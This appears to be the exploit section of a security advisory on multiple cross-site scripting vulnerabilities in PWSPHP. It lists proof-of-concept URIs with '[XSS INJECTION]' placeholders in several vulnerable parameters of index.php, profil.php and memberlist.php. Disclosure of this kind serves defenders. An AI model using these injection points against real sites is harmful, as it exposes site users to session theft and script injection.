• info
• discussion
• exploit
• solution
• references

PWSPHP Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/index.php?mod=news&ac=plus&month=[XSS INJECTION]&annee=[XSS INJECTION]
http://www.example.com/index.php?mod=stats&aff=forum&nbractif=[XSS INJECTION]
http://www.example.com/index.php?mod=stats&aff=pages&annee=[XSS INJECTION]
http://www.example.com/profil.php?id=1%20[XSS INJECTION]
http://www.example.com/memberlist.php?mb_lettre=%A4%20[XSS INJECTION]
http://www.example.com/memberlist.php?mb1_order=id&mb1_ord=DESC&lettre=[XSS INJECTION]
http://www.example.com/index.php?&mod=recherche&choix_recherche=2&chaine_search=[XSS INJECTION]&multi_mots=tous&choix_forum=1&auteur_search=[XSS INJECTION]